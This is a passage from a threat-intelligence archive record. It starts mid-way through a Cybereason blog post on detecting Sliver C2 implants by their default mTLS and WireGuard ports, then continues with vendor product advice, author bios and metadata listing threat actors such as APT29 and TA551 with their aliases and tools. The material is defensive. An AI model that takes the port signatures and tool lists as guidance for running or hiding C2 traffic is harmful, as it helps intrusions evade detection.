However, communications on ports\r\nTCP/8888 and UDP/51820 could be detection opportunities.\r\nWe can also add another criterion, which is the fact that the process initiating the connection is either suspicious\r\n(randomly named, unsigned executable) or the result of a process injection (see GetSystem or Migrate features).\r\nCommunication on TCP port 8888\r\nmTLS connections default to TCP port 8888. As stated above, this can be used to create a detection logic:\r\nDetection Logic \r\nProcess has TLS encrypted network connections with a TCP service on TCP port 8888\r\nCommunication on UDP port 51820\r\nThe WireGuard VPN default port is UDP 51820; this information can be used to detect Sliver C2 implant\r\ncommunication.\r\nDetection Logic \r\nProcess has network connections with a UDP service on UDP port 51820\r\nCybereason Recommendations\r\nTo efficiently detect Sliver C2 attacks, Cybereason recommends the following:\r\nEnable both the Signature and Artificial Intelligence (AI) modes on the Cybereason NGAV, along with\r\nthe Detect and Prevent modes of this feature.\r\nIn your sensor policy, navigate to Behavioral Execution Prevention (BEP) and set both BEP and Variant\r\nPayload Prevention to Prevent\r\nHandle with caution files originating from external sources (Email, Web browsing).\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting\r\nqueries for detecting specific threats - to find out more about threat hunting and Managed Detection and\r\nResponse with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: You can find more details available on the NEST including custom threat hunting\r\nqueries for detecting this threat.\r\nCybereason is dedicated to teaming up with Defenders to end cyber attacks from endpoints to enterprise and to\r\neverywhere. 
Learn more about Cybereason XDR powered by Google Chronicle, check out our Extended\r\nDetection and Response (XDR) Toolkit, or schedule a demo today to learn how your organization can benefit\r\nfrom an operation-centric approach to security.\r\nAbout The Researchers \r\nLoïc Castel, Incident Response Investigator, Cybereason Incident Response Team\r\nLoïc Castel is an IR investigator with the Cybereason Incident Response team. Loïc analyses and researches\r\ncritical incidents and cybercriminals. In his career, Loïc worked as a security auditor in well-known organizations\r\nsuch as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics\r\n\u0026 Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive\r\naspects such as vulnerability research.\r\nMeroujan Antonyan, Senior Security Analyst, Cybereason Global SOC \r\nMeroujan Antonyan is a Senior Security Analyst with the Cybereason Global SOC team. Meroujan hunts for\r\nemerging threats and analyzes incidents in order to improve hunting techniques and procedures. He contributes to the\r\nautomation and interconnection of various cybersecurity projects to collect and leverage threat intelligence and\r\nbring value from security events. Meroujan has Digital Forensics \u0026 Incident Response experience and is\r\ninterested in low level malware development, oriented towards improving security solutions capabilities.\r\nSource: https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors"
	],
	"report_names": [
		"sliver-c2-leveraged-by-many-threat-actors"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4594f985-865e-4862-8047-2e80226e246a",
			"created_at": "2022-10-27T08:27:12.984825Z",
			"updated_at": "2026-04-10T02:00:05.293575Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"EXOTIC LILY"
			],
			"source_name": "MITRE:EXOTIC LILY",
			"tools": [
				"Bazar"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "56384d06-abc2-4853-8440-db4d7b7d1b5f",
			"created_at": "2023-01-06T13:46:39.367122Z",
			"updated_at": "2026-04-10T02:00:03.303733Z",
			"deleted_at": null,
			"main_name": "EXOTIC LILY",
			"aliases": [
				"DEV-0413"
			],
			"source_name": "MISPGALAXY:EXOTIC LILY",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434942,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.pdf",
		"text": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.txt",
		"img": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.jpg"
	}
}